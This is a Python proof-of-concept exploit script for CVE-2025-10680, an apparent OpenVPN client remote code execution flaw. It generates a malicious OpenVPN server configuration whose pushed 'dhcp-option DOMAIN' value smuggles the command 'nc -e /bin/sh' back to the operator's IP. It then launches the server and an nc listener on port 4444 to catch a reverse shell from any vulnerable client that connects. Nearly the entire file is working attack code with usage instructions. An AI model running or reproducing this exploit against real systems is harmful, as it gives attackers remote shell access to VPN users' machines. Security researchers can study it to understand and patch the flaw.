#!/usr/bin/env python3
"""
CVE-2025-10680 PoC: OpenVPN RCE via DNS Script Injection
Author: Blackash ==> The ghost of the anonymous
Usage: sudo python3 CVE-2025-10680.py --server-ip 192.168.1.100 --client-cert-dir /path/to/ca
Test: Connect vulnerable client to this server → reverse shell on 4444.
"""

import argparse
import os
import signal
import subprocess
import sys
import tempfile
import time
from pathlib import Path

class OpenVPNExploit:
    def __init__(self, server_ip, client_cert_dir):
        self.server_ip = server_ip
        self.cert_dir = Path(client_cert_dir)
        self.server_conf = None
        self.ovpn_proc = None
        self.nc_proc = None
        self.running = True

    def signal_handler(self, sig, frame):
        print("\n[!] Shutting down... Cleanup time. 💀")
        if self.ovpn_proc:
            self.ovpn_proc.terminate()
        if self.nc_proc:
            self.nc_proc.terminate()
        if self.server_conf:
            os.unlink(self.server_conf)
        sys.exit(0)

    def generate_server_conf(self):
        fd, conf_path = tempfile.mkstemp(suffix='.conf')
        self.server_conf = conf_path
        injection = f"; nc -e /bin/sh {self.server_ip} 4444 #"
        conf_content = f"""port 1194
proto udp
dev tun
ca {self.cert_dir / 'pki/ca.crt'}
cert {self.cert_dir / 'pki/issued/server.crt'}
key {self.cert_dir / 'pki/private/server.key'}
dh {self.cert_dir / 'pki/dh.pem'}
topology subnet
server 10.8.0.0 255.255.255.0
push "redirect-gateway def1"
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DOMAIN '{injection}'"  # 🧨 INJECTION POINT
keepalive 10 120
cipher AES-256-GCM
persist-key
persist-tun
verb 3
client-cert-not-required  # Easy mode; add auth if needed
"""
        with os.fdopen(fd, 'w') as f:
            f.write(conf_content)
        print(f"[+] Server config generated: {conf_path}")
        print(f"[+] Poison payload: dhcp-option DOMAIN '{injection}'")
        return conf_path

    def start_openvpn(self):
        conf = self.generate_server_conf()
        cmd = ['openvpn', '--config', conf, '--daemon']
        self.ovpn_proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        print("[+] OpenVPN server started on UDP 1194 (check: netstat -ulnp | grep 1194)")
        time.sleep(2)  # Let it bind

    def start_nc_listener(self):
        cmd = ['nc', '-lvnp', '4444']
        self.nc_proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
        print("[+] NC listener ready on 4444. Connect a vulnerable client now! 🎯")
        print("Client cmd: sudo openvpn --config client.conf  # With --up /etc/openvpn/dns-updown.sh")

    def monitor(self):
        try:
            while self.running:
                if self.ovpn_proc.poll() is not None:
                    print("[-] OpenVPN exited unexpectedly!")
                    break
                time.sleep(1)
        except KeyboardInterrupt:
            self.signal_handler(None, None)

    def run(self):
        signal.signal(signal.SIGINT, self.signal_handler)
        self.start_openvpn()
        self.start_nc_listener()
        self.monitor()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-10680 PoC Server")
    parser.add_argument('--server-ip', required=True, help="Your server IP for reverse shell")
    parser.add_argument('--client-cert-dir', required=True, help="Path to easy-rsa output dir (e.g., ~/ca)")
    args = parser.parse_args()

    if not Path(args.client_cert_dir).exists():
        print(f"[-] Cert dir {args.client_cert_dir} not found! Gen certs first.")
        sys.exit(1)

    exploit = OpenVPNExploit(args.server_ip, args.client_cert_dir)
    exploit.run()
